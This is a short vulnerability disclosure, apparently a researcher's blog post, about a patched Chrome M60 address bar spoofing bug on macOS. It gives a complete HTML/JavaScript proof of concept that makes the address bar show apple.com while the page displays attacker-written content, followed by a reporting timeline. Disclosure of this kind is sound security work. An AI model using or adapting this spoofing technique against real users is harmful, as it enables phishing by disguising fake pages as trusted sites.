September 14, 2018

Chrome M60 address bar spoofing

Description

There was an address bar Spoofing vulnerability in chrome browser which allow an attacker to trick a user into visiting a spoof website that appears to be legitimate.

Recently, chromium team has a defense which gives the new page (apple.com in this case) 4 seconds to render after its URL appears in the omnibox for resolved these spoofing problem in general.If the 4 second timer expires then the display goes all white.

So unfortunately, this PoC cannot work in release M61,and then chromium ream closed this report on Aug 2.

Affected version

chrome version < 61.0.3163.79 on macOS platform

The PoC

<body>
<a id=test href="javascript:window.open('https://www.apple.com','aaa')" onclick="spoof()">Apple.com</a>
</body>

<script>

var a;
var b;

function spoof(){

a= window.open("https://www.apple.com:82","aaa");

a.document.write("<h1>Spoofing by Wester!</h1>");
slow();
b = setInterval('core()',1);

setTimeout(function(){
    clearInterval(b);
},10000);

}

function slow() {
for (i=0; i<10; i++ ) {

iframe = document.createElement("iframe");
iframe.src = 'https://www.google.com';
iframe.style = 'display:none';
document.body.appendChild(iframe);

}
}

function core(){
try{
a.location.href !== 'about:blank';
}
catch (e){

//stop page loading
a.location.href='https://www.google.com/csi';
  }
}
</script>
spoof

Timeline

- Report to chromium on Jul 31

- Report was closed by chromium on Aug 2

- Public disclosed  on Dec 6